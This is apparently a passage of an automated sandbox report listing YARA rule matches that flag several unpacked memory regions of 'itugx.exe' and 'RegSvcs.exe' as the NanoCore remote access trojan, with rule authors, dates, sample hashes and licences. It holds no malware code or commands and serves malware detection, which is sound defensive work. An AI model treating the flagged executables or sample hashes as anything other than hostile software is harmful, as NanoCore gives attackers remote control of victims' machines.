      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
